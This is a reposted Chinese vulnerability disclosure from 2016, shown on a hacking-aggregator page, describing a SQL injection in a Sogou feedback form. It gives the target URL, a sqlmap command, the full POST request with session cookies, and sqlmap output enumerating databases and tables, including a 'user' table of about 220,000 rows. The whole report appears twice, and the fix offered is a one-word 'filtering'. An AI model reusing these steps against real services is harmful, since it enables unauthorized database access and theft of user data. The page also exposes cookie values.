记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

搜狗某处SQL注入泄露22w用户信息

2016-06-30 23:30

RT


http://fankui.help.sogou.com/index.php/web/web/index?type=6 抓包看了下 加个单引号报错防不胜防

111.png

 


sqlmap语法:sqlmap.py -r 1.txt --dbs
----------------数据包-------
POST /index.php/web/web/addShenSu HTTP/1.1
Host: fankui.help.sogou.com
Proxy-Connection: keep-alive
Content-Length: 120
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://fankui.help.sogou.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://fankui.help.sogou.com/index.php/web/web/index?type=6
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: SUV=00D41AA9DE4930F75734A445360CE715; SNUID=465E0E96474D7AE00298446D48C4D629; SUID=0E1649DE2208990A000000005734A933; m=45390C4EEF5AF7959CC32A4FFB401114; GOTO=Af99046; [email protected]@@@@@@@@@@; YYID=45390C4EEF5AF7959CC32A4FFB401114; LSTMV=320%2C69; LCLKINT=1145; usid=eJINqnJQY9tgFkkg; IPLOC=CN3302; PHPSESSID=bh2gtfs2om3k7a19bom6okc260

Shensu%5BwebAdr%5D=http%3A%2F%2Fwww.sogou.com%2F&Shensu%5Breason%5D=1&Shensu%5Bcontact%5D=313%40q.com&webContactWayType=

 


数据库信息
available databases [3]:
[*] information_schema
[*] sogou_zhanzhang
[*] test

当前库表信息
Database: sogou_zhanzhang
+-------------------------------+---------+
| Table | Entries |
+-------------------------------+---------+
| deadlink_wap_data | 15191050 |
| url_submit | 547950 |
| url_submit_view | 547950 |
| website | 270697 |
| website_view | 270697 |
| `user` | 220754 |
| sitemap | 175918 |
| sitemap_copy | 175417 |
| sitemap_view | 168249 |
| site_name | 73232 |
| website_precision | 67856 |
| site_name_view | 65060 |
| fault_block_log | 54773 |
| sitemap_wap | 52806 |
| fault_block | 51056 |
| sitemap_wap_view | 48773 |
| sitemap_invitation | 45320 |
| sitemap_invitation_view | 43771 |
| site_icon | 42416 |
| site_icon_view | 42067 |
| spider_pressure_feedback | 31070 |
| sitemap_invitation_log | 28583 |
| site_logo | 27750 |
| site_logo_view | 25608 |
| site_name_log | 24155 |
| spider_pressure_feedback_view | 23755 |
| web2wap | 20046 |
| web2wap_view | 19268 |
| site_logo_log | 17607 |
| renzheng_log | 16555 |
| supply_fetch | 14501 |
| site_icon_log | 13925 |
| renzheng | 9324 |
| fb_updateshensu | 5427 |
| fb_shensu | 5341 |
| web2wap_log | 4917 |
| fb_img | 3720 |
| redirection | 3696 |
| redirection_view | 3696 |
| tb_member | 3682 |
| feedback | 3270 |
| fb_tool | 2906 |
| feedback_view | 2773 |
| url_shoulu | 2577 |
| umis_waitingfavicon_log | 2568 |
| umis_waitingfavicon | 2520 |
| site_param | 1992 |
| sitemap_blacklist | 1917 |
| site_param_view | 1825 |
| website_precision_log | 1064 |
| user_change_log | 968 |
| redirection_log | 561 |
| fb_suggestion | 289 |
| fb_jubao | 201 |
| fb_record | 153 |
| renzheng_set | 106 |
| fb_kuaizhao | 81 |
| mail_view | 78 |
| backend_user | 74 |
| website_log | 63 |
| product_black_list | 24 |
| user_invitation | 19 |
| notice | 18 |
| fb_updatetool | 14 |
| website_precision_maxid | 7 |
| columnist | 5 |
| partner_white_list | 5 |
| mail_group | 1 |
| site_param_log | 1 |
+-------------------------------+---------+

 


http://fankui.help.sogou.com/index.php/web/web/index?type=6 抓包看了下 加个单引号报错防不胜防


 

111.png


 


sqlmap语法:sqlmap.py -r 1.txt --dbs
----------------数据包-------
POST /index.php/web/web/addShenSu HTTP/1.1
Host: fankui.help.sogou.com
Proxy-Connection: keep-alive
Content-Length: 120
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://fankui.help.sogou.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://fankui.help.sogou.com/index.php/web/web/index?type=6
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: SUV=00D41AA9DE4930F75734A445360CE715; SNUID=465E0E96474D7AE00298446D48C4D629; SUID=0E1649DE2208990A000000005734A933; m=45390C4EEF5AF7959CC32A4FFB401114; GOTO=Af99046; [email protected]@@@@@@@@@@; YYID=45390C4EEF5AF7959CC32A4FFB401114; LSTMV=320%2C69; LCLKINT=1145; usid=eJINqnJQY9tgFkkg; IPLOC=CN3302; PHPSESSID=bh2gtfs2om3k7a19bom6okc260

Shensu%5BwebAdr%5D=http%3A%2F%2Fwww.sogou.com%2F&Shensu%5Breason%5D=1&Shensu%5Bcontact%5D=313%40q.com&webContactWayType=

数据库信息
available databases [3]:
[*] information_schema
[*] sogou_zhanzhang
[*] test

当前库表信息
Database: sogou_zhanzhang
+-------------------------------+---------+
| Table | Entries |
+-------------------------------+---------+
| deadlink_wap_data | 15191050 |
| url_submit | 547950 |
| url_submit_view | 547950 |
| website | 270697 |
| website_view | 270697 |
| `user` | 220754 |
| sitemap | 175918 |
| sitemap_copy | 175417 |
| sitemap_view | 168249 |
| site_name | 73232 |
| website_precision | 67856 |
| site_name_view | 65060 |
| fault_block_log | 54773 |
| sitemap_wap | 52806 |
| fault_block | 51056 |
| sitemap_wap_view | 48773 |
| sitemap_invitation | 45320 |
| sitemap_invitation_view | 43771 |
| site_icon | 42416 |
| site_icon_view | 42067 |
| spider_pressure_feedback | 31070 |
| sitemap_invitation_log | 28583 |
| site_logo | 27750 |
| site_logo_view | 25608 |
| site_name_log | 24155 |
| spider_pressure_feedback_view | 23755 |
| web2wap | 20046 |
| web2wap_view | 19268 |
| site_logo_log | 17607 |
| renzheng_log | 16555 |
| supply_fetch | 14501 |
| site_icon_log | 13925 |
| renzheng | 9324 |
| fb_updateshensu | 5427 |
| fb_shensu | 5341 |
| web2wap_log | 4917 |
| fb_img | 3720 |
| redirection | 3696 |
| redirection_view | 3696 |
| tb_member | 3682 |
| feedback | 3270 |
| fb_tool | 2906 |
| feedback_view | 2773 |
| url_shoulu | 2577 |
| umis_waitingfavicon_log | 2568 |
| umis_waitingfavicon | 2520 |
| site_param | 1992 |
| sitemap_blacklist | 1917 |
| site_param_view | 1825 |
| website_precision_log | 1064 |
| user_change_log | 968 |
| redirection_log | 561 |
| fb_suggestion | 289 |
| fb_jubao | 201 |
| fb_record | 153 |
| renzheng_set | 106 |
| fb_kuaizhao | 81 |
| mail_view | 78 |
| backend_user | 74 |
| website_log | 63 |
| product_black_list | 24 |
| user_invitation | 19 |
| notice | 18 |
| fb_updatetool | 14 |
| website_precision_maxid | 7 |
| columnist | 5 |
| partner_white_list | 5 |
| mail_group | 1 |
| site_param_log | 1 |
+-------------------------------+---------+

解决方案:

过滤

知识来源: www.2cto.com/Article/201606/521259.html

阅读:475486 | 评论:0 | 标签:注入

想收藏或者和大家分享这篇好文章→复制链接地址

“搜狗某处SQL注入泄露22w用户信息”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云